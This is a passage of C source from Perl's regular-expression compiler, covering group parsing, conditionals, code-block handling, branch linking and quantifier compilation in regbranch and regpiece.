* we know, by completing the parse to get all the
* groups, and then reparsing */
if (ALL_PARENS_COUNTED) {
RExC_parse++;
vFAIL("Reference to nonexistent group");
}
else {
REQUIRE_PARENS_PASS;
}
}
} else if ( paren == '+' ) {
num = RExC_npar + num - 1;
}
/* We keep track how many GOSUB items we have produced.
To start off the ARG2L() of the GOSUB holds its "id",
which is used later in conjunction with RExC_recurse
to calculate the offset we need to jump for the GOSUB,
which it will store in the final representation.
We have to defer the actual calculation until much later
as the regop may move.
*/
ret = reg2Lanode(pRExC_state, GOSUB, num, RExC_recurse_count);
if (num >= RExC_npar) {
/* It might be a forward reference; we can't fail until we
* know, by completing the parse to get all the groups, and
* then reparsing */
if (ALL_PARENS_COUNTED) {
if (num >= RExC_total_parens) {
RExC_parse++;
vFAIL("Reference to nonexistent group");
}
}
else {
REQUIRE_PARENS_PASS;
}
}
RExC_recurse_count++;
DEBUG_OPTIMISE_MORE_r(Perl_re_printf( aTHX_
"%*s%*s Recurse #%" UVuf " to %" IVdf "\n",
22, "| |", (int)(depth * 2 + 1), "",
(UV)ARG(REGNODE_p(ret)),
(IV)ARG2L(REGNODE_p(ret))));
RExC_seen |= REG_RECURSE_SEEN;
Set_Node_Length(REGNODE_p(ret),
1 + regarglen[OP(REGNODE_p(ret))]); /* MJD */
Set_Node_Offset(REGNODE_p(ret), parse_start); /* MJD */
*flagp |= POSTPONED;
assert(*RExC_parse == ')');
nextchar(pRExC_state);
return ret;
/* NOTREACHED */
case '?': /* (??...) */
is_logical = 1;
if (*RExC_parse != '{') {
RExC_parse += SKIP_IF_CHAR(RExC_parse, RExC_end);
/* diag_listed_as: Sequence (?%s...) not recognized in regex; marked by <-- HERE in m/%s/ */
vFAIL2utf8f(
"Sequence (%" UTF8f "...) not recognized",
UTF8fARG(UTF, RExC_parse-seqstart, seqstart));
NOT_REACHED; /*NOTREACHED*/
}
*flagp |= POSTPONED;
paren = '{';
RExC_parse++;
/* FALLTHROUGH */
case '{': /* (?{...}) */
{
U32 n = 0;
struct reg_code_block *cb;
OP * o;
RExC_seen_zerolen++;
if ( !pRExC_state->code_blocks
|| pRExC_state->code_index
>= pRExC_state->code_blocks->count
|| pRExC_state->code_blocks->cb[pRExC_state->code_index].start
!= (STRLEN)((RExC_parse -3 - (is_logical ? 1 : 0))
- RExC_start)
) {
if (RExC_pm_flags & PMf_USE_RE_EVAL)
FAIL("panic: Sequence (?{...}): no code block found\n");
FAIL("Eval-group not allowed at runtime, use re 'eval'");
}
/* this is a pre-compiled code block (?{...}) */
cb = &pRExC_state->code_blocks->cb[pRExC_state->code_index];
RExC_parse = RExC_start + cb->end;
o = cb->block;
if (cb->src_regex) {
n = add_data(pRExC_state, STR_WITH_LEN("rl"));
RExC_rxi->data->data[n] =
(void*)SvREFCNT_inc((SV*)cb->src_regex);
RExC_rxi->data->data[n+1] = (void*)o;
}
else {
n = add_data(pRExC_state,
(RExC_pm_flags & PMf_HAS_CV) ? "L" : "l", 1);
RExC_rxi->data->data[n] = (void*)o;
}
pRExC_state->code_index++;
nextchar(pRExC_state);
if (is_logical) {
regnode_offset eval;
ret = reg_node(pRExC_state, LOGICAL);
eval = reg2Lanode(pRExC_state, EVAL,
n,
/* for later propagation into (??{})
* return value */
RExC_flags & RXf_PMf_COMPILETIME
);
FLAGS(REGNODE_p(ret)) = 2;
if (! REGTAIL(pRExC_state, ret, eval)) {
REQUIRE_BRANCHJ(flagp, 0);
}
/* deal with the length of this later - MJD */
return ret;
}
ret = reg2Lanode(pRExC_state, EVAL, n, 0);
Set_Node_Length(REGNODE_p(ret), RExC_parse - parse_start + 1);
Set_Node_Offset(REGNODE_p(ret), parse_start);
return ret;
}
case '(': /* (?(?{...})...) and (?(?=...)...) */
{
int is_define= 0;
const int DEFINE_len = sizeof("DEFINE") - 1;
if ( RExC_parse < RExC_end - 1
&& ( ( RExC_parse[0] == '?' /* (?(?...)) */
&& ( RExC_parse[1] == '='
|| RExC_parse[1] == '!'
|| RExC_parse[1] == '<'
|| RExC_parse[1] == '{'))
|| ( RExC_parse[0] == '*' /* (?(*...)) */
&& ( memBEGINs(RExC_parse + 1,
(Size_t) (RExC_end - (RExC_parse + 1)),
"pla:")
|| memBEGINs(RExC_parse + 1,
(Size_t) (RExC_end - (RExC_parse + 1)),
"plb:")
|| memBEGINs(RExC_parse + 1,
(Size_t) (RExC_end - (RExC_parse + 1)),
"nla:")
|| memBEGINs(RExC_parse + 1,
(Size_t) (RExC_end - (RExC_parse + 1)),
"nlb:")
|| memBEGINs(RExC_parse + 1,
(Size_t) (RExC_end - (RExC_parse + 1)),
"positive_lookahead:")
|| memBEGINs(RExC_parse + 1,
(Size_t) (RExC_end - (RExC_parse + 1)),
"positive_lookbehind:")
|| memBEGINs(RExC_parse + 1,
(Size_t) (RExC_end - (RExC_parse + 1)),
"negative_lookahead:")
|| memBEGINs(RExC_parse + 1,
(Size_t) (RExC_end - (RExC_parse + 1)),
"negative_lookbehind:"))))
) { /* Lookahead or eval. */
I32 flag;
regnode_offset tail;
ret = reg_node(pRExC_state, LOGICAL);
FLAGS(REGNODE_p(ret)) = 1;
tail = reg(pRExC_state, 1, &flag, depth+1);
RETURN_FAIL_ON_RESTART(flag, flagp);
if (! REGTAIL(pRExC_state, ret, tail)) {
REQUIRE_BRANCHJ(flagp, 0);
}
goto insert_if;
}
else if ( RExC_parse[0] == '<' /* (?(<NAME>)...) */
|| RExC_parse[0] == '\'' ) /* (?('NAME')...) */
{
char ch = RExC_parse[0] == '<' ? '>' : '\'';
char *name_start= RExC_parse++;
U32 num = 0;
SV *sv_dat=reg_scan_name(pRExC_state, REG_RSN_RETURN_DATA);
if ( RExC_parse == name_start
|| RExC_parse >= RExC_end
|| *RExC_parse != ch)
{
vFAIL2("Sequence (?(%c... not terminated",
(ch == '>' ? '<' : ch));
}
RExC_parse++;
if (sv_dat) {
num = add_data( pRExC_state, STR_WITH_LEN("S"));
RExC_rxi->data->data[num]=(void*)sv_dat;
SvREFCNT_inc_simple_void_NN(sv_dat);
}
ret = reganode(pRExC_state, NGROUPP, num);
goto insert_if_check_paren;
}
else if (memBEGINs(RExC_parse,
(STRLEN) (RExC_end - RExC_parse),
"DEFINE"))
{
ret = reganode(pRExC_state, DEFINEP, 0);
RExC_parse += DEFINE_len;
is_define = 1;
goto insert_if_check_paren;
}
else if (RExC_parse[0] == 'R') {
RExC_parse++;
/* parno == 0 => /(?(R)YES|NO)/ "in any form of recursion OR eval"
* parno == 1 => /(?(R0)YES|NO)/ "in GOSUB (?0) / (?R)"
* parno == 2 => /(?(R1)YES|NO)/ "in GOSUB (?1) (parno-1)"
*/
parno = 0;
if (RExC_parse[0] == '0') {
parno = 1;
RExC_parse++;
}
else if (inRANGE(RExC_parse[0], '1', '9')) {
UV uv;
endptr = RExC_end;
if (grok_atoUV(RExC_parse, &uv, &endptr)
&& uv <= I32_MAX
) {
parno = (I32)uv + 1;
RExC_parse = (char*)endptr;
}
/* else "Switch condition not recognized" below */
} else if (RExC_parse[0] == '&') {
SV *sv_dat;
RExC_parse++;
sv_dat = reg_scan_name(pRExC_state,
REG_RSN_RETURN_DATA);
if (sv_dat)
parno = 1 + *((I32 *)SvPVX(sv_dat));
}
ret = reganode(pRExC_state, INSUBP, parno);
goto insert_if_check_paren;
}
else if (inRANGE(RExC_parse[0], '1', '9')) {
/* (?(1)...) */
char c;
UV uv;
endptr = RExC_end;
if (grok_atoUV(RExC_parse, &uv, &endptr)
&& uv <= I32_MAX
) {
parno = (I32)uv;
RExC_parse = (char*)endptr;
}
else {
vFAIL("panic: grok_atoUV returned FALSE");
}
ret = reganode(pRExC_state, GROUPP, parno);
insert_if_check_paren:
if (UCHARAT(RExC_parse) != ')') {
RExC_parse += UTF
? UTF8_SAFE_SKIP(RExC_parse, RExC_end)
: 1;
vFAIL("Switch condition not recognized");
}
nextchar(pRExC_state);
insert_if:
if (! REGTAIL(pRExC_state, ret, reganode(pRExC_state,
IFTHEN, 0)))
{
REQUIRE_BRANCHJ(flagp, 0);
}
br = regbranch(pRExC_state, &flags, 1, depth+1);
if (br == 0) {
RETURN_FAIL_ON_RESTART(flags,flagp);
FAIL2("panic: regbranch returned failure, flags=%#" UVxf,
(UV) flags);
} else
if (! REGTAIL(pRExC_state, br, reganode(pRExC_state,
LONGJMP, 0)))
{
REQUIRE_BRANCHJ(flagp, 0);
}
c = UCHARAT(RExC_parse);
nextchar(pRExC_state);
if (flags&HASWIDTH)
*flagp |= HASWIDTH;
if (c == '|') {
if (is_define)
vFAIL("(?(DEFINE)....) does not allow branches");
/* Fake one for optimizer. */
lastbr = reganode(pRExC_state, IFTHEN, 0);
if (!regbranch(pRExC_state, &flags, 1, depth+1)) {
RETURN_FAIL_ON_RESTART(flags, flagp);
FAIL2("panic: regbranch returned failure, flags=%#" UVxf,
(UV) flags);
}
if (! REGTAIL(pRExC_state, ret, lastbr)) {
REQUIRE_BRANCHJ(flagp, 0);
}
if (flags&HASWIDTH)
*flagp |= HASWIDTH;
c = UCHARAT(RExC_parse);
nextchar(pRExC_state);
}
else
lastbr = 0;
if (c != ')') {
if (RExC_parse >= RExC_end)
vFAIL("Switch (?(condition)... not terminated");
else
vFAIL("Switch (?(condition)... contains too many branches");
}
ender = reg_node(pRExC_state, TAIL);
if (! REGTAIL(pRExC_state, br, ender)) {
REQUIRE_BRANCHJ(flagp, 0);
}
if (lastbr) {
if (! REGTAIL(pRExC_state, lastbr, ender)) {
REQUIRE_BRANCHJ(flagp, 0);
}
if (! REGTAIL(pRExC_state,
REGNODE_OFFSET(
NEXTOPER(
NEXTOPER(REGNODE_p(lastbr)))),
ender))
{
REQUIRE_BRANCHJ(flagp, 0);
}
}
else
if (! REGTAIL(pRExC_state, ret, ender)) {
REQUIRE_BRANCHJ(flagp, 0);
}
#if 0 /* Removing this doesn't cause failures in the test suite -- khw */
RExC_size++; /* XXX WHY do we need this?!!
For large programs it seems to be required
but I can't figure out why. -- dmq*/
#endif
return ret;
}
RExC_parse += UTF
? UTF8_SAFE_SKIP(RExC_parse, RExC_end)
: 1;
vFAIL("Unknown switch condition (?(...))");
}
case '[': /* (?[ ... ]) */
return handle_regex_sets(pRExC_state, NULL, flagp, depth+1,
oregcomp_parse);
case 0: /* A NUL */
RExC_parse--; /* for vFAIL to print correctly */
vFAIL("Sequence (? incomplete");
break;
case ')':
if (RExC_strict) { /* [perl #132851] */
ckWARNreg(RExC_parse, "Empty (?) without any modifiers");
}
/* FALLTHROUGH */
default: /* e.g., (?i) */
RExC_parse = (char *) seqstart + 1;
parse_flags:
parse_lparen_question_flags(pRExC_state);
if (UCHARAT(RExC_parse) != ':') {
if (RExC_parse < RExC_end)
nextchar(pRExC_state);
*flagp = TRYAGAIN;
return 0;
}
paren = ':';
nextchar(pRExC_state);
ret = 0;
goto parse_rest;
} /* end switch */
}
else {
if (*RExC_parse == '{') {
ckWARNregdep(RExC_parse + 1,
"Unescaped left brace in regex is "
"deprecated here (and will be fatal "
"in Perl 5.32), passed through");
}
/* Not bothering to indent here, as the above 'else' is temporary
* */
if (!(RExC_flags & RXf_PMf_NOCAPTURE)) { /* (...) */
capturing_parens:
parno = RExC_npar;
RExC_npar++;
if (! ALL_PARENS_COUNTED) {
/* If we are in our first pass through (and maybe only pass),
* we need to allocate memory for the capturing parentheses
* data structures.
*/
if (!RExC_parens_buf_size) {
/* first guess at number of parens we might encounter */
RExC_parens_buf_size = 10;
/* setup RExC_open_parens, which holds the address of each
* OPEN tag, and to make things simpler for the 0 index the
* start of the program - this is used later for offsets */
Newxz(RExC_open_parens, RExC_parens_buf_size,
regnode_offset);
RExC_open_parens[0] = 1; /* +1 for REG_MAGIC */
/* setup RExC_close_parens, which holds the address of each
* CLOSE tag, and to make things simpler for the 0 index
* the end of the program - this is used later for offsets
* */
Newxz(RExC_close_parens, RExC_parens_buf_size,
regnode_offset);
/* we dont know where end op starts yet, so we dont need to
* set RExC_close_parens[0] like we do RExC_open_parens[0]
* above */
}
else if (RExC_npar > RExC_parens_buf_size) {
I32 old_size = RExC_parens_buf_size;
RExC_parens_buf_size *= 2;
Renew(RExC_open_parens, RExC_parens_buf_size,
regnode_offset);
Zero(RExC_open_parens + old_size,
RExC_parens_buf_size - old_size, regnode_offset);
Renew(RExC_close_parens, RExC_parens_buf_size,
regnode_offset);
Zero(RExC_close_parens + old_size,
RExC_parens_buf_size - old_size, regnode_offset);
}
}
ret = reganode(pRExC_state, OPEN, parno);
if (!RExC_nestroot)
RExC_nestroot = parno;
if (RExC_open_parens && !RExC_open_parens[parno])
{
DEBUG_OPTIMISE_MORE_r(Perl_re_printf( aTHX_
"%*s%*s Setting open paren #%" IVdf " to %d\n",
22, "| |", (int)(depth * 2 + 1), "",
(IV)parno, ret));
RExC_open_parens[parno]= ret;
}
Set_Node_Length(REGNODE_p(ret), 1); /* MJD */
Set_Node_Offset(REGNODE_p(ret), RExC_parse); /* MJD */
is_open = 1;
} else {
/* with RXf_PMf_NOCAPTURE treat (...) as (?:...) */
paren = ':';
ret = 0;
}
}
}
else /* ! paren */
ret = 0;
parse_rest:
/* Pick up the branches, linking them together. */
parse_start = RExC_parse; /* MJD */
br = regbranch(pRExC_state, &flags, 1, depth+1);
/* branch_len = (paren != 0); */
if (br == 0) {
RETURN_FAIL_ON_RESTART(flags, flagp);
FAIL2("panic: regbranch returned failure, flags=%#" UVxf, (UV) flags);
}
if (*RExC_parse == '|') {
if (RExC_use_BRANCHJ) {
reginsert(pRExC_state, BRANCHJ, br, depth+1);
}
else { /* MJD */
reginsert(pRExC_state, BRANCH, br, depth+1);
Set_Node_Length(REGNODE_p(br), paren != 0);
Set_Node_Offset_To_R(br, parse_start-RExC_start);
}
have_branch = 1;
}
else if (paren == ':') {
*flagp |= flags&SIMPLE;
}
if (is_open) { /* Starts with OPEN. */
if (! REGTAIL(pRExC_state, ret, br)) { /* OPEN -> first. */
REQUIRE_BRANCHJ(flagp, 0);
}
}
else if (paren != '?') /* Not Conditional */
ret = br;
*flagp |= flags & (SPSTART | HASWIDTH | POSTPONED);
lastbr = br;
while (*RExC_parse == '|') {
if (RExC_use_BRANCHJ) {
bool shut_gcc_up;
ender = reganode(pRExC_state, LONGJMP, 0);
/* Append to the previous. */
shut_gcc_up = REGTAIL(pRExC_state,
REGNODE_OFFSET(NEXTOPER(NEXTOPER(REGNODE_p(lastbr)))),
ender);
PERL_UNUSED_VAR(shut_gcc_up);
}
nextchar(pRExC_state);
if (freeze_paren) {
if (RExC_npar > after_freeze)
after_freeze = RExC_npar;
RExC_npar = freeze_paren;
}
br = regbranch(pRExC_state, &flags, 0, depth+1);
if (br == 0) {
RETURN_FAIL_ON_RESTART(flags, flagp);
FAIL2("panic: regbranch returned failure, flags=%#" UVxf, (UV) flags);
}
if (! REGTAIL(pRExC_state, lastbr, br)) { /* BRANCH -> BRANCH. */
REQUIRE_BRANCHJ(flagp, 0);
}
lastbr = br;
*flagp |= flags & (SPSTART | HASWIDTH | POSTPONED);
}
if (have_branch || paren != ':') {
regnode * br;
/* Make a closing node, and hook it on the end. */
switch (paren) {
case ':':
ender = reg_node(pRExC_state, TAIL);
break;
case 1: case 2:
ender = reganode(pRExC_state, CLOSE, parno);
if ( RExC_close_parens ) {
DEBUG_OPTIMISE_MORE_r(Perl_re_printf( aTHX_
"%*s%*s Setting close paren #%" IVdf " to %d\n",
22, "| |", (int)(depth * 2 + 1), "",
(IV)parno, ender));
RExC_close_parens[parno]= ender;
if (RExC_nestroot == parno)
RExC_nestroot = 0;
}
Set_Node_Offset(REGNODE_p(ender), RExC_parse+1); /* MJD */
Set_Node_Length(REGNODE_p(ender), 1); /* MJD */
break;
case 's':
ender = reg_node(pRExC_state, SRCLOSE);
RExC_in_script_run = 0;
break;
case '<':
case 'a':
case 'A':
case 'b':
case 'B':
case ',':
case '=':
case '!':
*flagp &= ~HASWIDTH;
/* FALLTHROUGH */
case 't': /* aTomic */
case '>':
ender = reg_node(pRExC_state, SUCCEED);
break;
case 0:
ender = reg_node(pRExC_state, END);
assert(!RExC_end_op); /* there can only be one! */
RExC_end_op = REGNODE_p(ender);
if (RExC_close_parens) {
DEBUG_OPTIMISE_MORE_r(Perl_re_printf( aTHX_
"%*s%*s Setting close paren #0 (END) to %d\n",
22, "| |", (int)(depth * 2 + 1), "",
ender));
RExC_close_parens[0]= ender;
}
break;
}
DEBUG_PARSE_r({
DEBUG_PARSE_MSG("lsbr");
regprop(RExC_rx, RExC_mysv1, REGNODE_p(lastbr), NULL, pRExC_state);
regprop(RExC_rx, RExC_mysv2, REGNODE_p(ender), NULL, pRExC_state);
Perl_re_printf( aTHX_ "~ tying lastbr %s (%" IVdf ") to ender %s (%" IVdf ") offset %" IVdf "\n",
SvPV_nolen_const(RExC_mysv1),
(IV)lastbr,
SvPV_nolen_const(RExC_mysv2),
(IV)ender,
(IV)(ender - lastbr)
);
});
if (! REGTAIL(pRExC_state, lastbr, ender)) {
REQUIRE_BRANCHJ(flagp, 0);
}
if (have_branch) {
char is_nothing= 1;
if (depth==1)
RExC_seen |= REG_TOP_LEVEL_BRANCHES_SEEN;
/* Hook the tails of the branches to the closing node. */
for (br = REGNODE_p(ret); br; br = regnext(br)) {
const U8 op = PL_regkind[OP(br)];
if (op == BRANCH) {
if (! REGTAIL_STUDY(pRExC_state,
REGNODE_OFFSET(NEXTOPER(br)),
ender))
{
REQUIRE_BRANCHJ(flagp, 0);
}
if ( OP(NEXTOPER(br)) != NOTHING
|| regnext(NEXTOPER(br)) != REGNODE_p(ender))
is_nothing= 0;
}
else if (op == BRANCHJ) {
bool shut_gcc_up = REGTAIL_STUDY(pRExC_state,
REGNODE_OFFSET(NEXTOPER(NEXTOPER(br))),
ender);
PERL_UNUSED_VAR(shut_gcc_up);
/* for now we always disable this optimisation * /
if ( OP(NEXTOPER(NEXTOPER(br))) != NOTHING
|| regnext(NEXTOPER(NEXTOPER(br))) != REGNODE_p(ender))
*/
is_nothing= 0;
}
}
if (is_nothing) {
regnode * ret_as_regnode = REGNODE_p(ret);
br= PL_regkind[OP(ret_as_regnode)] != BRANCH
? regnext(ret_as_regnode)
: ret_as_regnode;
DEBUG_PARSE_r({
DEBUG_PARSE_MSG("NADA");
regprop(RExC_rx, RExC_mysv1, ret_as_regnode,
NULL, pRExC_state);
regprop(RExC_rx, RExC_mysv2, REGNODE_p(ender),
NULL, pRExC_state);
Perl_re_printf( aTHX_ "~ converting ret %s (%" IVdf ") to ender %s (%" IVdf ") offset %" IVdf "\n",
SvPV_nolen_const(RExC_mysv1),
(IV)REG_NODE_NUM(ret_as_regnode),
SvPV_nolen_const(RExC_mysv2),
(IV)ender,
(IV)(ender - ret)
);
});
OP(br)= NOTHING;
if (OP(REGNODE_p(ender)) == TAIL) {
NEXT_OFF(br)= 0;
RExC_emit= REGNODE_OFFSET(br) + 1;
} else {
regnode *opt;
for ( opt= br + 1; opt < REGNODE_p(ender) ; opt++ )
OP(opt)= OPTIMIZED;
NEXT_OFF(br)= REGNODE_p(ender) - br;
}
}
}
}
{
const char *p;
/* Even/odd or x=don't care: 010101x10x */
static const char parens[] = "=!aA<,>Bbt";
/* flag below is set to 0 up through 'A'; 1 for larger */
if (paren && (p = strchr(parens, paren))) {
U8 node = ((p - parens) % 2) ? UNLESSM : IFMATCH;
int flag = (p - parens) > 3;
if (paren == '>' || paren == 't') {
node = SUSPEND, flag = 0;
}
reginsert(pRExC_state, node, ret, depth+1);
Set_Node_Cur_Length(REGNODE_p(ret), parse_start);
Set_Node_Offset(REGNODE_p(ret), parse_start + 1);
FLAGS(REGNODE_p(ret)) = flag;
if (! REGTAIL_STUDY(pRExC_state, ret, reg_node(pRExC_state, TAIL)))
{
REQUIRE_BRANCHJ(flagp, 0);
}
}
}
/* Check for proper termination. */
if (paren) {
/* restore original flags, but keep (?p) and, if we've encountered
* something in the parse that changes /d rules into /u, keep the /u */
RExC_flags = oregflags | (RExC_flags & RXf_PMf_KEEPCOPY);
if (DEPENDS_SEMANTICS && RExC_uni_semantics) {
set_regex_charset(&RExC_flags, REGEX_UNICODE_CHARSET);
}
if (RExC_parse >= RExC_end || UCHARAT(RExC_parse) != ')') {
RExC_parse = oregcomp_parse;
vFAIL("Unmatched (");
}
nextchar(pRExC_state);
}
else if (!paren && RExC_parse < RExC_end) {
if (*RExC_parse == ')') {
RExC_parse++;
vFAIL("Unmatched )");
}
else
FAIL("Junk on end of regexp"); /* "Can't happen". */
NOT_REACHED; /* NOTREACHED */
}
if (RExC_in_lookbehind) {
RExC_in_lookbehind--;
}
if (after_freeze > RExC_npar)
RExC_npar = after_freeze;
return(ret);
}
/*
- regbranch - one alternative of an | operator
*
* Implements the concatenation operator.
*
* On success, returns the offset at which any next node should be placed into
* the regex engine program being compiled.
*
* Returns 0 otherwise, setting flagp to RESTART_PARSE if the parse needs
* to be restarted, or'd with NEED_UTF8 if the pattern needs to be upgraded to
* UTF-8
*/
STATIC regnode_offset
S_regbranch(pTHX_ RExC_state_t *pRExC_state, I32 *flagp, I32 first, U32 depth)
{
regnode_offset ret;
regnode_offset chain = 0;
regnode_offset latest;
I32 flags = 0, c = 0;
GET_RE_DEBUG_FLAGS_DECL;
PERL_ARGS_ASSERT_REGBRANCH;
DEBUG_PARSE("brnc");
if (first)
ret = 0;
else {
if (RExC_use_BRANCHJ)
ret = reganode(pRExC_state, BRANCHJ, 0);
else {
ret = reg_node(pRExC_state, BRANCH);
Set_Node_Length(REGNODE_p(ret), 1);
}
}
*flagp = WORST; /* Tentatively. */
skip_to_be_ignored_text(pRExC_state, &RExC_parse,
FALSE /* Don't force to /x */ );
while (RExC_parse < RExC_end && *RExC_parse != '|' && *RExC_parse != ')') {
flags &= ~TRYAGAIN;
latest = regpiece(pRExC_state, &flags, depth+1);
if (latest == 0) {
if (flags & TRYAGAIN)
continue;
RETURN_FAIL_ON_RESTART(flags, flagp);
FAIL2("panic: regpiece returned failure, flags=%#" UVxf, (UV) flags);
}
else if (ret == 0)
ret = latest;
*flagp |= flags&(HASWIDTH|POSTPONED);
if (chain == 0) /* First piece. */
*flagp |= flags&SPSTART;
else {
/* FIXME adding one for every branch after the first is probably
* excessive now we have TRIE support. (hv) */
MARK_NAUGHTY(1);
if (! REGTAIL(pRExC_state, chain, latest)) {
/* XXX We could just redo this branch, but figuring out what
* bookkeeping needs to be reset is a pain, and it's likely
* that other branches that goto END will also be too large */
REQUIRE_BRANCHJ(flagp, 0);
}
}
chain = latest;
c++;
}
if (chain == 0) { /* Loop ran zero times. */
chain = reg_node(pRExC_state, NOTHING);
if (ret == 0)
ret = chain;
}
if (c == 1) {
*flagp |= flags&SIMPLE;
}
return ret;
}
/*
- regpiece - something followed by possible quantifier * + ? {n,m}
*
* Note that the branching code sequences used for ? and the general cases
* of * and + are somewhat optimized: they use the same NOTHING node as
* both the endmarker for their branch list and the body of the last branch.
* It might seem that this node could be dispensed with entirely, but the
* endmarker role is not redundant.
*
* On success, returns the offset at which any next node should be placed into
* the regex engine program being compiled.
*
* Returns 0 otherwise, with *flagp set to indicate why:
* TRYAGAIN if regatom() returns 0 with TRYAGAIN.
* RESTART_PARSE if the parse needs to be restarted, or'd with
* NEED_UTF8 if the pattern needs to be upgraded to UTF-8.
*/
STATIC regnode_offset
S_regpiece(pTHX_ RExC_state_t *pRExC_state, I32 *flagp, U32 depth)
{
regnode_offset ret;
char op;
char *next;
I32 flags;
const char * const origparse = RExC_parse;
I32 min;
I32 max = REG_INFTY;
#ifdef RE_TRACK_PATTERN_OFFSETS
char *parse_start;
#endif
const char *maxpos = NULL;
UV uv;
/* Save the original in case we change the emitted regop to a FAIL. */
const regnode_offset orig_emit = RExC_emit;
GET_RE_DEBUG_FLAGS_DECL;
PERL_ARGS_ASSERT_REGPIECE;
DEBUG_PARSE("piec");
ret = regatom(pRExC_state, &flags, depth+1);
if (ret == 0) {
RETURN_FAIL_ON_RESTART_OR_FLAGS(flags, flagp, TRYAGAIN);
FAIL2("panic: regatom returned failure, flags=%#" UVxf, (UV) flags);
}
op = *RExC_parse;
if (op == '{' && regcurly(RExC_parse)) {
maxpos = NULL;
#ifdef RE_TRACK_PATTERN_OFFSETS
parse_start = RExC_parse; /* MJD */
#endif
next = RExC_parse + 1;
while (isDIGIT(*next) || *next == ',') {
if (*next == ',') {
if (maxpos)
break;
else
maxpos = next;
}
next++;
}
if (*next == '}') { /* got one */
const char* endptr;
if (!maxpos)
maxpos = next;
RExC_parse++;
if (isDIGIT(*RExC_parse)) {
endptr = RExC_end;
if (!grok_atoUV(RExC_parse, &uv, &endptr))
vFAIL("Invalid quantifier in {,}");
if (uv >= REG_INFTY)
vFAIL2("Quantifier in {,} bigger than %d", REG_INFTY - 1);
min = (I32)uv;
} else {
min = 0;
}
if (*maxpos == ',')
maxpos++;
else
maxpos = RExC_parse;
if (isDIGIT(*maxpos)) {
endptr = RExC_end;
if (!grok_atoUV(maxpos, &uv, &endptr))
vFAIL("Invalid quantifier in {,}");
if (uv >= REG_INFTY)
vFAIL2("Quantifier in {,} bigger than %d", REG_INFTY - 1);
max = (I32)uv;
} else {
max = REG_INFTY; /* meaning "infinity" */
}
RExC_parse = next;
nextchar(pRExC_state);
if (max < min) { /* If can't match, warn and optimize to fail
unconditionally */
reginsert(pRExC_state, OPFAIL, orig_emit, depth+1);
ckWARNreg(RExC_parse, "Quantifier {n,m} with n > m can't match");
NEXT_OFF(REGNODE_p(orig_emit)) =
regarglen[OPFAIL] + NODE_STEP_REGNODE;
return ret;
}
else if (min == max && *RExC_parse == '?')
{
ckWARN2reg(RExC_parse + 1,
"Useless use of greediness modifier '%c'",
*RExC_parse);
}
do_curly:
if ((flags&SIMPLE)) {
if (min == 0 && max == REG_INFTY) {
reginsert(pRExC_state, STAR, ret, depth+1);
MARK_NAUGHTY(4);
RExC_seen |= REG_UNBOUNDED_QUANTIFIER_SEEN;
goto nest_check;
}
if (min == 1 && max == REG_INFTY) {
reginsert(pRExC_state, PLUS, ret, depth+1);
MARK_NAUGHTY(3);
RExC_seen |= REG_UNBOUNDED_QUANTIFIER_SEEN;
goto nest_check;
}
MARK_NAUGHTY_EXP(2, 2);
reginsert(pRExC_state, CURLY, ret, depth+1);
Set_Node_Offset(REGNODE_p(ret), parse_start+1); /* MJD */
Set_Node_Cur_Length(REGNODE_p(ret), parse_start);
}
else {
const regnode_offset w = reg_node(pRExC_state, WHILEM);
FLAGS(REGNODE_p(w)) = 0;
if (! REGTAIL(pRExC_state, ret, w)) {
REQUIRE_BRANCHJ(flagp, 0);
}
if (RExC_use_BRANCHJ) {
reginsert(pRExC_state, LONGJMP, ret, depth+1);
reginsert(pRExC_state, NOTHING, ret, depth+1);
NEXT_OFF(REGNODE_p(ret)) = 3; /* Go over LONGJMP. */
}
reginsert(pRExC_state, CURLYX, ret, depth+1);
/* MJD hk */
Set_Node_Offset(REGNODE_p(ret), parse_start+1);
Set_Node_Length(REGNODE_p(ret),
op == '{' ? (RExC_parse - parse_start) : 1);
if (RExC_use_BRANCHJ)
NEXT_OFF(REGNODE_p(ret)) = 3; /* Go over NOTHING to
LONGJMP. */
if (! REGTAIL(pRExC_state, ret, reg_node(pRExC_state,
NOTHING)))
{
REQUIRE_BRANCHJ(flagp, 0);
}
RExC_whilem_seen++;
MARK_NAUGHTY_EXP(1, 4); /* compound interest */
}
FLAGS(REGNODE_p(ret)) = 0;
if (min > 0)
*flagp = WORST;
if (max > 0)
*flagp |= HASWIDTH;
ARG1_SET(REGNODE_p(ret), (U16)min);
ARG2_SET(REGNODE_p(ret), (U16)max);
if (max == REG_INFTY)
RExC_seen |= REG_UNBOUNDED_QUANTIFIER_SEEN;
goto nest_check;
}
}
if (!ISMULT1(op)) {
*flagp = flags;
return(ret);
}
#if 0 /* Now runtime fix should be reliable. */
/* if this is reinstated, don't forget to put this back into perldiag:
=item Regexp *+ operand could be empty at {#} in regex m/%s/
(F) The part of the regexp subject to either the * or + quantifier
could match an empty string. The {#} shows in the regular
expression about where the problem was discovered.
*/
if (!(flags&HASWIDTH) && op != '?')
vFAIL("Regexp *+ operand could be empty");
#endif
#ifdef RE_TRACK_PATTERN_OFFSETS
parse_start = RExC_parse;
#endif
nextchar(pRExC_state);
*flagp = (op != '+') ? (WORST|SPSTART|HASWIDTH) : (WORST|HASWIDTH);
if (op == '*') {
min = 0;
goto do_curly;
}
else if (op == '+') {
min = 1;
goto do_curly;
}
else if (op == '?') {
min = 0; max = 1;
goto do_curly;
}
nest_check:
if (!(flags&(HASWIDTH|POSTPONED)) && max > REG_INFTY/3) {
ckWARN2reg(RExC_parse,
"%" UTF8f " matches null string many times",
UTF8fARG(UTF, (RExC_parse >= origparse
? RExC_parse - origparse
: 0),
origparse));
}
if (*RExC_parse == '?') {
nextchar(pRExC_state);
reginsert(pRExC_state, MINMOD, ret, depth+1);
if (! REGTAIL(pRExC_state, ret, ret + NODE_STEP_REGNODE)) {
REQUIRE_BRANCHJ(flagp, 0);
}
}
else if (*RExC_parse == '+') {
regnode_offset ender;
nextchar(pRExC_state);
ender = reg_node(pRExC_state, SUCCEED);
if (! REGTAIL(pRExC_state, ret, ender)) {
REQUIRE_BRANCHJ(flagp, 0);
}
reginsert(pRExC_state, SUSPEND, ret, depth+1);
ender = reg_node(pRExC_state, TAIL);
if (! REGTAIL(pRExC_state, ret, ender)) {
REQUIRE_BRANCHJ(flagp, 0);
}
}
if (ISMULT2(RExC_parse)) {
RExC_parse++;
vFAIL("Nested quantifiers");
}
return(ret);
}
STATIC bool
S_grok_bslash_N(pTHX_ RExC_state_t *pRExC_state,
regnode_offset * node_p,
UV * code_point_p,
int * cp_count,
I32 * flagp,
const bool strict,
const U32 depth
)
{
